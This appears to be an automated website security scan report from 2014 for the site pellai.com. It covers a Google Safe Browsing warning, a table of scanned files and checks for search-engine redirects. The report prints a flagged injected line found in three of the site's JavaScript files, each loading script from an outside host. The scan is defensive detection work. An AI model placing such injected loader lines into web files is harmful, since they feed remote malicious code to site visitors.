Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pellai.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://pellai.com/ | 200 OK Content-Length: 2592 Content-Type: text/html | clean |
http://pellai.com/js/jquery-1.4.4.js | 200 OK Content-Length: 183325 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://bossesportiu.com/R9Y4hcvL.php?id=60823299"></script>');
| ||
http://pellai.com/js/jquery.lwtCountdown-1.0.js | 200 OK Content-Length: 5157 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://bossesportiu.com/R9Y4hcvL.php?id=60823300"></script>');
| ||
http://pellai.com/js/misc.js | 200 OK Content-Length: 1214 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://bossesportiu.com/R9Y4hcvL.php?id=60823301"></script>');
| ||
http://masajesyscortsmty.com/m8CPzkgh.php?id=60823298 | 200 OK Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://masajesyscortsmty.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://masajesyscortsmty.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 06 Apr 2014 07:09:10 GMT Location: http://masajesyscortsmty.com/blog/ Server: nginx/1.4.7 Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 | clean |
http://masajesyscortsmty.com/blog/ | 200 OK Content-Length: 111378 Content-Type: text/html | clean |
http://masajesyscortsmty.com/blog/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://masajesyscortsmty.com/blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://masajesyscortsmty.com/blog/wp-content/themes/graphene/js/jquery.tools.min.js?ver=3.8.1 | 200 OK Content-Length: 11032 Content-Type: application/javascript | clean |
http://masajesyscortsmty.com/blog/wp-content/themes/graphene/js/graphene.js?ver=3.8.1 | 200 OK Content-Length: 8446 Content-Type: application/javascript | clean |
http://innercountyoutreach.org/bgnkCp78.php?id=89400085 | 200 OK Content-Length: 708 Content-Type: text/html | clean |
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://innercountyoutreach.org/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pellai.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Apr 2014 07:09:05 GMT
Server: Apache
Content-Length: 2592
Content-Type: text/html
X-Powered-By: PHP/5.3.22
X-Powered-By: PleskLin
...2592 bytes of data.
GET / HTTP/1.1
Host: pellai.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Apr 2014 07:09:05 GMT
Server: Apache
Content-Length: 2592
Content-Type: text/html
X-Powered-By: PHP/5.3.22
X-Powered-By: PleskLin
...2592 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pellai.com
Referer: http://www.google.com/search?q=pellai.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pellai.com
Referer: http://www.google.com/search?q=pellai.com
Result:
The result is similar to the first query. There are no suspicious redirects found.